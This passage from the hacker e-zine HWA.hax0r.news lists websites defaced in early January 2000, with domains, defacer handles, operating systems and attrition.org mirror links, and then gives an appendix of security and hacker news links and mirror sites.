University School Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.smus.bc.ca Defaced by: OHB Operating System: Windows NT Potentially offensive content on defaced page. Defaced domain: lazylizard.net Site Title: LazyLizard Internet Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/lazylizard.net Defaced by: Blazinweed Operating System: Linux Potentially offensive content on defaced page. Defaced domain: www.dunnavan.com Site Title: C.C. Dunnavan & Co Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.dunnavan.com Defaced by: Ass0mbracao Operating System: Windows NT Defaced domain: zeus.logical.it Site Title: Logical Instruments S.N.C. Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/zeus.logical.it Defaced by: k5 krew Operating System: Windows NT Defaced domain: www.verdonk.net Site Title: Verdonk Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.verdonk.net Defaced by: Blazinweed Operating System: Linux Potentially offensive content on defaced page. Defaced domain: www.motorscan.com Site Title: Motorscan Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.motorscan.com Defaced by: kryptek Operating System: Solaris Defaced domain: www.ultramagnetic.com Site Title: Ultra Magnetic Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.ultramagnetic.com Defaced by: auto36047 Operating System: Windows NT Potentially offensive content on defaced page. Defaced domain: www.jse.co.za Site Title: Johannesburg Stock Exchange Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.jse.co.za Defaced by: aKt0r Operating System: Windows NT Attrition comment: Allegedly the equivalent of Nasdaq for South Africa Defaced domain: www.yuuki.com Site Title: Yuuki Hashimoto Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.yuuki.com Defaced by: kryptek Operating System: Solaris Defaced domain: hazmatstorage.com Site Title: Hazmat Storage Containers Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/hazmatstorage.com Defaced by: kryptek Operating System: Solaris Potentially offensive content on defaced page. Defaced domain: www.slawek.com Site Title: SH Enterprises Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.slawek.com Defaced by: Blazinweed Operating System: Linux Potentially offensive content on defaced page. Defaced domain: www.wwh.net Site Title: Web World Hosting Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.wwh.net Defaced by: Sodium Operating System: Linux Potentially offensive content on defaced page. Defaced domain: www.ubaldi.org Site Title: Movimento Civilta Parmigiana Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.ubaldi.org Defaced by: kryptek Operating System: Solaris Potentially offensive content on defaced page. Defaced domain: www.hiroshi.com Site Title: Hiroshi Sakai Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.hiroshi.com Defaced by: kryptek Operating System: Solaris Defaced domain: www.galtech.com Site Title: Gal Tech Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.galtech.com Defaced by: Blazinweed Operating System: Linux Potentially offensive content on defaced page. Defaced domain: aee.hq.faa.gov Site Title: FAA Office of Environment and Energy Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/aee.hq.faa.gov Defaced by: hyrax Operating System: Windows NT FREE KEVIN reference in the HTML HIDDEN comments in the HTML. Defaced domain: www.stilex.com.br Site Title: Stilex Brazil Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.stilex.com.br Defaced by: kryptek Operating System: Solaris Potentially offensive content on defaced page. Defaced domain: www.tevi.com Site Title: Tele vision Gmbh Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.tevi.com Defaced by: DHC Operating System: BSDI Defaced domain: www.fibblesnork.com Site Title: Fibblesnork Productions Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.fibblesnork.com Defaced by: kryptek Operating System: Solaris Defaced domain: www.esperidi.org Site Title: Edizioni Blu Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.esperidi.org Defaced by: kryptek Operating System: Solaris Potentially offensive content on defaced page. Defaced domain: www.gabinetedaimagem.com.br Site Title: Gabinet da imagem Mirror: http://www.attrition.org/mirror/attrition/2000/01/08/www.gabinetedaimagem.com.br Defaced by: kryptek Operating System: Solaris Potentially offensive content on defaced page. Defaced domain: www.anti-mail.com Site Title: Anti-Mail Mirror: http://www.attrition.org/mirror/attrition/2000/01/09/www.anti-mail.com Defaced by: kryptek Operating System: Solaris Defaced domain: www.tesnet.net Site Title: TesNet Mirror: http://www.attrition.org/mirror/attrition/2000/01/09/www.tesnet.net Defaced by: secto0r Operating System: Linux Defaced domain: www.inferno-piercing.com Site Title: Inferno Piercing Mirror: http://www.attrition.org/mirror/attrition/2000/01/09/www.inferno-piercing.com Defaced by: kryptek Operating System: Solaris Defaced domain: www.jasonhill.com Site Title: Jason Hill's Web site Mirror: http://www.attrition.org/mirror/attrition/2000/01/09/www.jasonhill.com Defaced by: kryptek Operating System: Solaris Defaced domain: www.anti-boards.com Site Title: Anti-Boards Mirror: http://www.attrition.org/mirror/attrition/2000/01/09/www.anti-boards.com Defaced by: kryptek Defaced domain: www.kaizenstudios.com Site Title: Kaizen Studios Mirror: http://www.attrition.org/mirror/attrition/2000/01/09/www.kaizenstudios.com Defaced by: kryptek Operating System: Solaris Defaced domain: www.philadelphiaexperiment.com Site Title: Philadelphia Eperiment Mirror: http://www.attrition.org/mirror/attrition/2000/01/09/www.philadelphiaexperiment.com Defaced by: kryptek Operating System: Solaris Potentially offensive content on defaced page. Defaced domain: www.lazymice.com Site Title: Lazy Mice Mirror: http://www.attrition.org/mirror/attrition/2000/01/09/www.lazymice.com Defaced by: kryptek Operating System: Solaris Defaced domain: www.sportslinc.com Site Title: Sports Linc Mirror: http://www.attrition.org/mirror/attrition/2000/01/09/www.sportslinc.com Defaced by: kryptek Operating System: Solaris Potentially offensive content on defaced page. Defaced domain: www.skatenerd.com Site Title: Skate Nerd Mirror: http://www.attrition.org/mirror/attrition/2000/01/09/www.skatenerd.com Defaced by: kryptek Operating System: Solaris Potentially offensive content on defaced page. Defaced domain: www.networktimes.co.za Site Title: Network Times S.A. Mirror: http://www.attrition.org/mirror/attrition/2000/01/09/www.networktimes.co.za Defaced by: aKt0r Operating System: Windows NT Defaced domain: www.cool.com Site Title: Cool.com Mirror: http://www.attrition.org/mirror/attrition/2000/01/09/www.cool.com Defaced by: fuqrag Operating System: Windows NT Attrition comment: It appears that fuqrag is back Defaced domain: www.chosen.co.za Site Title: Chosen South Africa Mirror: http://www.attrition.org/mirror/attrition/2000/01/09/www.chosen.co.za Defaced by: Uneek Tech Operating System: Linux Potentially offensive content on defaced page. Defaced domain: qaru.ars.usda.gov Site Title: Department of Agriculture Mirror: http://www.attrition.org/mirror/attrition/2000/01/09/qaru.ars.usda.gov Defaced by: hyrax Operating System: Irix Defaced domain: www.europe.dla.mil Site Title: Defense Logistics Agency Mirror: http://www.attrition.org/mirror/attrition/2000/01/09/www.europe.dla.mil Defaced by: hyrax Operating System: NT Defaced domain: geomag.usgs.gov Site Title: United States Geological Survey Mirror: http://www.attrition.org/mirror/attrition/2000/01/09/geomag.usgs.gov Defaced by: hyrax Operating System: NT Defaced domain: www.nsgass.navy.mil Site Title: Navy Mirror: http://www.attrition.org/mirror/attrition/2000/01/09/www.nsgass.navy.mil Defaced by: hyrax Operating System: NT Potentially offensive content on defaced page. Defaced domain: lej-www.med.navy.mil Site Title: Navy Mirror: http://www.attrition.org/mirror/attrition/2000/01/09/lej-www.med.navy.mil Defaced by: hyrax Operating System: NT Potentially offensive content on defaced page. Defaced domain: environ.nosc.mil Site Title: Naval Ocean Systems Center Mirror: http://www.attrition.org/mirror/attrition/2000/01/09/environ.nosc.mil Defaced by: hyrax Operating System: NT Defaced domain: www.dsa.ca.gov Site Title: State of California Mirror: http://www.attrition.org/mirror/attrition/2000/01/09/www.dsa.ca.gov Defaced by: hyrax Operating System: NT Potentially offensive content on defaced page. Defaced domain: www.ahahealth.com Site Title: American Homeowners Association Mirror: http://www.attrition.org/mirror/attrition/2000/01/09/www.ahahealth.com Defaced by: kryptek Operating System: Solaris Potentially offensive content on defaced page. Defaced domain: www.Kuwait-airport.com.kw Site Title: Kuwait Airport Mirror: http://www.attrition.org/mirror/attrition/2000/01/09/www.Kuwait-airport.com.kw Defaced by: Team Echo Operating System: NT Potentially offensive content on defaced page. Defaced domain: pirs.mvr.usace.army.mil Site Title: ARMY SIGNAL COMMAND Mirror: http://www.attrition.org/mirror/attrition/2000/01/09/pirs.mvr.usace.army.mil Defaced by: hyrax Operating System: NT Potentially offensive content on defaced page. Defaced domain: www.euresys.be Site Title: Euresys Corporation Mirror: http://www.attrition.org/mirror/attrition/2000/01/09/www.euresys.be Defaced by: hyrax Operating System: Windows NT Defaced domain: www.thepeopleswwf.com Site Title: The People Mirror: http://www.attrition.org/mirror/attrition/2000/01/09/www.thepeopleswwf.com Operating System: Linux FREE KEVIN reference in the HTML Potentially offensive content on defaced page. Defaced domain: www.plusmail.com Site Title: Plus Mail Mirror: http://www.attrition.org/mirror/attrition/2000/01/09/www.plusmail.com Defaced by: Morbid Angel Operating System: Linux Defaced domain: www.clearwater.dcmde.dla.mil Site Title: Defense Contract Management District East (Clearwater Florida Office) Mirror: http://www.attrition.org/mirror/attrition/2000/01/09/www.clearwater.dcmde.dla.mil Defaced by: hyrax Operating System: Windows NT Defaced domain: fla.esf.edu Site Title: Faculty of Landscape Architecture, SUNY College of Environmental Science and Forestry Mirror: http://www.attrition.org/mirror/attrition/2000/01/09/fla.esf.edu Defaced by: hyrax Operating System: Windows NT Defaced domain: magis.creighton.edu Site Title: Creighton University MAGIS server Mirror: http://www.attrition.org/mirror/attrition/2000/01/09/magis.creighton.edu Defaced by: hyrax Operating System: Windows NT Defaced domain: indepstudy.ext.missouri.edu Site Title: Center for Independent Study at the University of Missouri Mirror: http://www.attrition.org/mirror/attrition/2000/01/09/indepstudy.ext.missouri.edu Defaced by: hyrax Operating System: Windows NT Defaced domain: www.tyte-online.com Site Title: Tyte Online Mirror: http://www.attrition.org/mirror/attrition/2000/01/09/www.tyte-online.com Operating System: Linux FREE KEVIN reference in the HTML Defaced domain: www.cisupport.com Site Title: CI Host Mirror: http://www.attrition.org/mirror/attrition/2000/01/09/www.cisupport.com HIDDEN comments in the HTML. Potentially offensive content on defaced page. Defaced domain: www.getrealproductions.com Site Title: Get Real Productions Mirror: http://www.attrition.org/mirror/attrition/2000/01/09/www.getrealproductions.com Defaced by: Blazin Weed Potentially offensive content on defaced page. and more sites at the attrition cracked web sites mirror: http://www.attrition.org/mirror/attrition/index.html ------------------------------------------------------------------------- A.0 APPENDICES _________________________________________________________________________ A.1 PHACVW, sekurity, security, cyberwar links ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The links are no longer maintained in this file, there is now a links section on the http://welcome.to/HWA.hax0r.news/ url so check there for current links etc. The hack FAQ (The #hack/alt.2600 faq) http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html Hacker's Jargon File (The quote file) http://www.lysator.liu.se/hackdict/split2/main_index.html New Hacker's Jargon File. http://www.tuxedo.org/~esr/jargon/ HWA.hax0r.news Mirror Sites around the world: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://blkops.venomous.net/hwa_hax0r_news/hwa_hax0r_news.asp ** NEW ** http://datatwirl.intranova.net ** NEW ** http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/ ** NEW ** http://net-security.org/hwahaxornews ** NEW ** http://www.sysbreakers.com/hwa ** NEW ** http://www.attrition.org/hosted/hwa/ http://www.attrition.org/~modify/texts/zines/HWA/ http://www.hackunlimited.com/zine/hwa/ *UPDATED* http://www.ducktank.net/hwa/issues.html. ** NEW ** http://www.alldas.de/hwaidx1.htm ** NEW ** http://www.csoft.net/~hwa/ http://www.digitalgeeks.com/hwa.*DOWN* http://members.tripod.com/~hwa_2k http://welcome.to/HWA.hax0r.news/ http://www.attrition.org/~modify/texts/zines/HWA/ http://archives.projectgamma.com/zines/hwa/. http://www.403-security.org/Htmls/hwa.hax0r.news.htm http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/ http://hwa.hax0r.news.8m.com/ http://www.fortunecity.com/skyscraper/feature/103/ International links:(TBC) ~~~~~~~~~~~~~~~~~~~~~~~~~ Foreign correspondants and others please send in news site links that have security news from foreign countries for inclusion in this list thanks... - Ed Belgium.......: http://securax.org/cum/ *New address* Brasil........: http://www.psynet.net/ka0z http://www.elementais.cjb.net Canada .......: http://www.hackcanada.com Croatia.......: http://security.monitor.hr Colombia......: http://www.cascabel.8m.com http://www.intrusos.cjb.net Finland ........http://hackunlimited.com/ Germany ........http://www.alldas.de/ http://www.security-news.com/ Indonesia.....: http://www.k-elektronik.org/index2.html http://members.xoom.com/neblonica/ http://hackerlink.or.id/ Netherlands...: http://security.pine.nl/ Russia........: http://www.tsu.ru/~eugene/ Singapore.....: http://www.icepoint.com South Africa ...http://www.hackers.co.za http://www.hack.co.za http://www.posthuman.za.net Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first and best security related e-zine. .za (South Africa) sites contributed by wyzwun tnx guy... Got a link for this section? email it to hwa@press.usmc.net and i'll review it and post it here if it merits it. @HWA -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- © 1998, 1999 (c) Cruciphux/HWA.hax0r.news (R) { w00t } -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] [45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]